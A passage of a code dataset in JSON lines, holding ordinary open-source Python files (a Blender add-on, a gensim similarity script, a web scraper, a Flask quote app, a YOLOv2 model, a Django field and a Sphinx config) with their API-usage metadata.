"line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 36, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "37545536405", "text": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"musicDownloader\",\n version=\"1.01\",\n\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n description=\"A video downloader, with integrated mp3 conversion and metadata addition\",\n\n author=\"dadope\",\n url=\"https://github.com/dadope/musicDownloader\",\n\n python_requires='>=3',\n include_package_data=True,\n packages=setuptools.find_packages(),\n\n entry_points={\n \"console_scripts\": [\"musicDownloader = musicDownloader.main:main\"]\n },\n\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ]\n)\n\n", "repo_name": "dadope/musicDownloader", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "18525872487", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy,re\nfrom bpy.types import Panel\nfrom bpy.props import StringProperty\n\n\nbl_info = {\n\t\"name\": \"KTX Image/Font Paths\",\n\t\"description\": \"Show/Edit All Image and Font Paths Directly\",\n\t\"author\": \"Roel Koster, @koelooptiemanna, irc:kostex\",\n\t\"version\": (1, 0, 2),\n\t\"blender\": (2, 80, 0),\n\t\"location\": \"Properties > Scene\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"https://github.com/kostex/blenderscripts/\",\n\t\"tracker_url\": \"https://developer.blender.org/maniphest/task/edit/form/2/\",\n\t\"category\": \"Scene\"}\n\n\nclass KTXIMAGEFONTPATHS_OT_RemoveSlashDots(bpy.types.Operator):\n\t\"\"\"Remove all \\..\"\"\"\n\tbl_idname = \"ktximagefontpaths.removeslashdots\"\n\tbl_label = \"Remove Slashdots\"\n\n\tdef execute(self, context):\n\t\tfor i in bpy.data.images:\n\t\t\ti.filepath=re.sub('\\.\\./','',i.filepath)\n\t\tfor i in bpy.data.fonts:\n\t\t\tif i.filepath != '':\n\t\t\t\ti.filepath=re.sub('\\.\\./','',i.filepath)\n\t\treturn {'FINISHED'}\n\n\nclass KTXIMAGEFONTPATHS_OT_Regex(bpy.types.Operator):\n\t\"\"\"Search and replace paths with regex\"\"\"\n\tbl_idname = \"ktximagefontpaths.regex\"\n\tbl_label = \"Search/Replace\"\n\n\tdef execute(self, context):\n\t\tscene = context.scene\n\t\tfor i in bpy.data.images:\n\t\t\ti.filepath=re.sub(scene.ktx_searchfield, scene.ktx_replacefield,i.filepath)\n\t\tfor i in bpy.data.fonts:\n\t\t\tif i.filepath != '':\n\t\t\t\ti.filepath=re.sub(scene.ktx_searchfield, scene.ktx_replacefield,i.filepath)\n\t\treturn {'FINISHED'}\n\n\nclass KTXIMAGEFONTPATHS_PT_Panel(bpy.types.Panel):\n\t\"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n\tbl_label = \"Image/Font Paths\"\n\tbl_idname = \"KTXIMAGEFONTPATHS_PT_Panel\"\n\tbl_space_type = 'PROPERTIES'\n\tbl_region_type = 'WINDOW'\n\tbl_context = \"scene\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\n\t\tscene = context.scene\n\n\t\tlayout.label(text=\" Images:\")\n\n\t\tfor i in bpy.data.images:\n\t\t\tif i.filepath != '':\n\t\t\t\tlayout.prop(i,\"filepath\", text=\"\")\n\n\t\tlayout.label(text=\" Fonts:\")\n\n\t\tfor f in bpy.data.fonts:\n\t\t\tif f.filepath != '':\n\t\t\t\tlayout.prop(f,\"filepath\", text=\"\")\n\n\t\tlayout.label(text=\" Tools:\")\n\n\t\tlayout.operator(\"ktximagefontpaths.removeslashdots\")\n\t\tlayout.prop(scene, \"ktx_searchfield\", text=\"Search\")\n\t\tlayout.prop(scene, \"ktx_replacefield\", text=\"Replace\")\n\t\tlayout.operator(\"ktximagefontpaths.regex\")\n\nclasses = (\n\tKTXIMAGEFONTPATHS_OT_RemoveSlashDots,\n\tKTXIMAGEFONTPATHS_OT_Regex,\n\tKTXIMAGEFONTPATHS_PT_Panel\n)\n\ndef register():\n\tbpy.types.Scene.ktx_searchfield = StringProperty(default='', description=\"Search for (regex)\")\n\tbpy.types.Scene.ktx_replacefield = StringProperty(default='', description=\"Replace with (regex)\")\n\tfrom bpy.utils import register_class\n\n\tfor cls in classes:\n\t\tregister_class(cls)\n\n\ndef unregister():\n\tdel bpy.types.Scene.ktx_searchfield\n\tdel bpy.types.Scene.ktx_replacefield\n\tfrom bpy.utils import unregister_class\n\n\tfor cls in classes:\n\t\tunregister_class(cls)\n\n\nif __name__ == \"__main__\":\n\tregister()\n", "repo_name": "kostex/blenderscripts", "sub_path": "KTX_ImageFontPaths.py", 
"file_name": "KTX_ImageFontPaths.py", "file_ext": "py", "file_size_in_byte": 3660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bpy.types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 43, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 44, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 45, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 47, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 51, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 58, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 60, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 87, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 105, "usage_type": "attribute"}, {"api_name": "bpy.props.StringProperty", "line_number": 105, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bpy.props.StringProperty", "line_number": 106, "usage_type": "call"}, {"api_name": "bpy.utils.register_class", "line_number": 110, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 115, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "44293126936", "text": "import logging\nimport json\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nfrom gensim import corpora\n\nwith open('FFM.json') as data_file:\n FFM = json.load(data_file)\n\ndocuments = FFM['Dansk']['5. - 6. 
klasse']['færdighed']\nv = \"eleven har viden om af alle alt andre at blev bliver bort da dag de dem den der deres det dig dog du efter eller en end er et far fik fin for forbi fordi frafri få gik glad godt ham han hanshar havde have hele hen hende her hjemhun hvad hver hvis hvor igen ikke indjeg jer jo kan kom kommer kun kunnelang lidt lige lille løb man mange medmeget men mere mig min mod mon måned nej noget nok nu når og ogsåom op os over på sagde se selvsidste sig sin sine skal skulle små somstor store så tid til tog ud undervar ved vi vil ville være været år\"\nstoplist = set(v.split())\n\ntexts = [[word for word in document.lower().split() if word not in stoplist]\n for document in documents]\n\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/tmm.dict') # store the dictionary, for future reference\nprint(dictionary)\n\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/tmm.mm', corpus) \n\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/tmm.dict')\ncorpus = corpora.MmCorpus('/tmp/tmm.mm') # comes from the first tutorial, \"From strings to vectors\"\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=12)\n\ndoc = \"Eleven kan anvende grafiske modeller\"\nvec_bow = dictionary.doc2bow(doc.lower().split())\nvec_lsi = lsi[vec_bow] # convert the query to LSI space\n\nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester.index')\n\nsims = index[vec_lsi] # perform a similarity query against the corpus\n#print(list(enumerate(sims))) # print (document_number, document_similarity) 2-tuples\nsims = sorted(enumerate(sims), key=lambda item: -item[1])\n#pprint(sims) # print sorted (document number, similarity score) 2-tuples\n\nwhile True:\n\tdoc = input('Skriv læringsmål, skriv q for at afslutte: ')\n\tif doc == 'q':\n\t\tbreak\n\tvec_bow = dictionary.doc2bow(doc.lower().split())\n\tvec_lsi = lsi[vec_bow] # convert the query to LSI space\n\n\tindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\n\tsims = index[vec_lsi] # perform a similarity query against the corpus\n\t#print(list(enumerate(sims))) # print (document_number, document_similarity) 2-tuples\n\tsims = sorted(enumerate(sims), key=lambda item: -item[1])\n\t#pprint(sims) # print sorted (document number, similarity score) 2-tuples\n\tfor i in range(5): #number of suggestions to print\n\t\tprint(str(i+1),': % ', str(sims[i][1]), ' ', documents[sims[i][0]],sep='')", "repo_name": "eugene/gyldendal", "sub_path": "analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 2915, "program_lang": "python", "lang": "da", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 5, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 22, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 22, "usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus.serialize", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus", 
"line_number": 27, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 27, "usage_type": "name"}, {"api_name": "gensim.corpora.Dictionary.load", "line_number": 31, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 31, "usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 32, "usage_type": "name"}, {"api_name": "gensim.models.LsiModel", "line_number": 34, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 34, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 40, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 40, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity.load", "line_number": 43, "usage_type": "call"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gensim.similarities", "line_number": 43, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 57, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "32798633285", "text": "# -*- coding: utf-8 -*-\n# coding=utf-8\n\"\"\"\nCreated on Mon Aug 13 11:10:39 2018\n\n@author: 95647\n\"\"\"\nimport urllib\nfrom urllib.parse import quote\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nimport string\nfrom mytictoc import tic, toc\n\ntic()\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\nurl = \"https://book.douban.com/tag/历史\"\ns = quote(url,safe=string.printable)\nreq = urllib.request.Request(s, headers=headers)\nhtml = urlopen(req)\n# print(html.read().decode(\"utf-8\"))\nbsObj = BeautifulSoup(html,'lxml')\nitems = bsObj.findAll(\"li\",class_=\"subject-item\")\nbook_info = []\nfor item in items:\n info = []\n titles = item.find(\"a\",title = re.compile(\".*\")).contents\n if len(titles)> 1 :\n bookname = str(titles[0].strip()) + str(titles[1].text.strip())\n else:\n bookname = titles[0].strip()\n publication =item.find(\"div\",class_=\"pub\").get_text().strip()\n comments = item.find(\"span\", class_=\"rating_nums\").text.strip()\n num = item.find(\"span\", class_=\"pl\").text.strip()\n brief = item.p.text.strip()\n info.append(bookname)\n info.append(publication)\n info.append(comments)\n info.append(num)\n info.append(brief)\n book_info.append(info)\n \ncolumn = [\"书名\",\"出版社\",\"评分\",\"参与人数\",\"内容简介\"]\nall_books_info = pd.DataFrame(columns=column ,data= book_info)\nall_books_info.to_csv(r\"\"\"C:\\Users\\95647\\Desktop\\douban_books.csv\"\"\")\ntoc() #this scarpy use of total time\n", "repo_name": "starkbling/website_scraping", "sub_path": "douban_scrapy.py", "file_name": "douban_scrapy.py", "file_ext": "py", "file_size_in_byte": 1533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mytictoc.tic", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 20, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 20, "usage_type": "attribute"}, {"api_name": "urllib.request.Request", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 21, "usage_type": "attribute"}, {"api_name": 
"urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "call"}, {"api_name": "mytictoc.toc", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "17841361817", "text": "from flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom quoter import quoteLister\nimport random\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\n@app.route('/')\n@cross_origin(supports_credentials=True)\ndef success():\n\treturn render_template(\"home.html\")\n\n@app.route('/quote', methods =['GET'])\n\ndef get_quote():\n\ttag = request.args['tag']\n\tcurrentQuoteList = quoteLister(tag)\n\tcurrentQuote = random.choice(currentQuoteList).strip()\n\treturn jsonify({'quote': currentQuote})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 5000)\n", "repo_name": "shellkore/quoteBoy", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "quoter.quoteLister", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "28535314068", "text": "import torch.nn as nn\nimport torch\nimport math\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torchvision.models as tv\nimport cv2\nimport numpy as np\nfrom torch.autograd import Variable\nfrom darknet import Darknet19\n\nclass YOLO_v2(nn.Module):\n def __init__(self):\n self.n_boxes = 5\n self.n_classes = 20\n super(YOLO_v2, self).__init__()\n\n darknet = Darknet19(pretrained=True).features\n\n self.feature = darknet\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer3 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer4 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=(self.n_boxes * (5 + self.n_classes)), kernel_size=(3, 3), padding=1))\n\n def forward(self, x):\n x = self.feature(x)\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n for box in range(0, self.n_boxes * (5 + self.n_classes), (5 + self.n_classes)):\n x[:, box:box+2, :, :] = torch.sigmoid(x[:, box:box+2, :, :]) # x, y\n x[:, box+2:box+4, :, :] = torch.exp(x[:, box+2:box+4, :, :]) # w, h\n x[:, box+4:box+5, :, :] = torch.sigmoid(x[:, box+4:box+5, :, :]) # probability of object\n 
x[:, box + 5:box + 5 + self.n_classes, :, :] = torch.sigmoid(x[:, box + 5:box + 5 + self.n_classes, :, :]) #class\n return x", "repo_name": "tw0226/YOLO_v2_pytorch", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1916, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "darknet.Darknet19", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "31286740398", "text": "from functools import partial\n\nfrom fastapi_mail import (\n FastMail,\n MessageSchema,\n ConnectionConfig,\n MessageType\n)\n\nfrom app.core.config import settings\n\n\ndef send_email_notification(\n subject: str,\n body: str\n) -> partial | None:\n\n if settings.EMAIL_RECIPIENTS:\n conf = ConnectionConfig(\n MAIL_USERNAME=settings.SMTP_USER,\n MAIL_PASSWORD=settings.SMTP_PASSWORD,\n MAIL_FROM=settings.SMTP_USER,\n MAIL_PORT=settings.SMTP_PORT,\n MAIL_SERVER=settings.SMTP_HOST,\n MAIL_SSL_TLS=settings.SMTP_SSL_TLS,\n MAIL_STARTTLS=True\n )\n\n message = MessageSchema(\n subject=subject,\n 
recipients=settings.EMAIL_RECIPIENTS,\n            body=body,\n            subtype=MessageType.plain\n        )\n\n        fast_mail = FastMail(conf)\n        return partial(fast_mail.send_message, message)\n", "repo_name": "Aykhan-s/Portfolio-Blog", "sub_path": "src/app/utils/email_utils.py", "file_name": "email_utils.py", "file_ext": "py", "file_size_in_byte": 910, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "app.core.config.settings.EMAIL_RECIPIENTS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi_mail.ConnectionConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "app.core.config.settings.SMTP_USER", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_PASSWORD", "line_number": 21, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_USER", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_PORT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_HOST", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 24, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_SSL_TLS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "fastapi_mail.MessageSchema", "line_number": 29, "usage_type": "call"}, {"api_name": "app.core.config.settings.EMAIL_RECIPIENTS", "line_number": 31, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "fastapi_mail.MessageType.plain", "line_number": 33, "usage_type": "attribute"}, {"api_name": "fastapi_mail.MessageType", "line_number": 33, "usage_type": "name"}, {"api_name": "fastapi_mail.FastMail", "line_number": 36, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 37, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "514202855", "text": "from collections import deque\ndef solution(s):\n    q = deque(s)\n    answer = True\n    stack = []\n    while q:\n        temp = q.popleft()\n        if temp == '(':\n            stack.append(temp)\n        elif temp == ')' and stack:\n            stack.pop()\n        else:\n            answer = False\n            break\n    if stack:\n        return False\n    return answer", "repo_name": "kypa123/PS", "sub_path": "코테/올바른 괄호_0818.py", "file_name": "올바른 괄호_0818.py", "file_ext": "py", "file_size_in_byte": 363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "25916494341", "text": "from django.db import models\nfrom django.core import checks\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass OrderField(models.PositiveIntegerField):\n    \"\"\"We are building a new custom field\"\"\"\n    \n    description = \"Ordering field on a unique field\"\n\n    def __init__(self, unique_for_field=None, *args, **kwargs):\n        self.unique_for_field = 
unique_for_field\n        super().__init__(*args, **kwargs)\n\n\n    def check(self, **kwargs):\n        \"\"\"I used docs for CharField and IntegerField to have an idea of how to write this\"\"\"\n        return [\n            *super().check(**kwargs),\n            *self._check_for_field_attribute(**kwargs),\n        ]\n    \n    def _check_for_field_attribute(self, **kwargs):\n        if self.unique_for_field is None:\n            return [\n                checks.Error(\"OrderField must define a 'unique_for_field' attribute\"),\n            ]\n        elif self.unique_for_field not in [f.name for f in self.model._meta.get_fields()]:\n            \"\"\"Checking if the field name provided is not defined in our model\"\"\"\n            return [\n                checks.Error(\"OrderField entered does not match an existing model field\"),\n            ]\n        else:\n            return []\n    \n\n    def pre_save(self, model_instance, add):\n        \"\"\"Every order number created passes through the pre_save function here\"\"\"\n        # print(model_instance)\n        if getattr(model_instance, self.attname) is None:\n            \"\"\"When no order number value is provided,\n            we need to generate one.\"\"\"\n            qs = self.model.objects.all() # self.model is the ProductLine model\n            # ' Select * from ProductLine where product=\"shoe\" '\n            try: # Build your query to filter out all of the Product-Line that belongs to a specific product\n                query = {\n                    self.unique_for_field: getattr(model_instance, self.unique_for_field) \n                }# {\"product\": \"Nike shoe\"}\n                qs = qs.filter(**query) # print(query) # print(qs)\n                last_item = qs.latest(self.attname) #self.attname == order #latest gets the last item\n                value = last_item.order+1\n            except ObjectDoesNotExist: #If no data in the database, then value = 1, first value\n                value = 1\n            return value #This saves directly to the order field in the db, #order = OrderField(unique_for_field=\"product\" , blank=True)\n        else:\n            return super().pre_save(model_instance, add)\n        \n    \n", "repo_name": "ataime365/django-drf-ecommerce", "sub_path": "ecommerce/product/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.PositiveIntegerField", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 6, "usage_type": "name"}, {"api_name": "django.core.checks.Error", "line_number": 26, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 26, "usage_type": "name"}, {"api_name": "django.core.checks.Error", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 31, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "39390246946", "text": "# # # Distribution Statement A. Approved for public release. Distribution unlimited.\n# # #\n# # # Author:\n# # # Naval Research Laboratory, Marine Meteorology Division\n# # #\n# # # This program is free software: you can redistribute it and/or modify it under\n# # # the terms of the NRLMMD License included with this program. This program is\n# # # distributed WITHOUT ANY WARRANTY; without even the implied warranty of\n# # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the included license\n# # # for more details. 
If you did not receive the license, for more information see:\n# # # https://github.com/U-S-NRL-Marine-Meteorology-Division/\n\n\"\"\"GeoIPS PKGNAME documentation build configuration file.\"\"\"\nimport sys\nimport os\nimport jinja2\nimport geoips\n\nVERSION = str(geoips.__version__)\n\nsource_path = os.path.dirname(os.path.abspath(__file__))\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n# sys.path.append(os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath(\"../sphinxext\"))\nsys.path.extend(\n    [\n        # numpy standard doc extensions\n        os.path.join(os.path.dirname(__file__), \"..\", \"../..\", \"sphinxext\")\n    ]\n)\n\n# Use Jinja for navigational tools\nwith open(os.path.join(source_path, \"_templates/indexrst.html\")) as f:\n    t = jinja2.Template(f.read())\nwith open(os.path.join(source_path, \"index.rst\"), \"w\") as f:\n    f.write(t.render())\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = \"5.3.0\"\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n    \"sphinx_design\",\n    \"sphinx.ext.autodoc\",\n    \"sphinx.ext.mathjax\",\n    \"sphinx.ext.napoleon\",\n    \"sphinx.ext.viewcode\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffixes as a list of strings:\nsource_suffix = [\".rst\"]\n\n# The encoding of source files.\nsource_encoding = \"utf-8\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# General information about the project.\nproject = \"GeoIPS, Geolocated Information Processing System\"\ncopyright = \"NOT APPLICABLE\"\nauthor = \"the U.S. NAVAL RESEARCH LABORATORY\"\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents. Consider setting version=release=VERSION\n#\n# 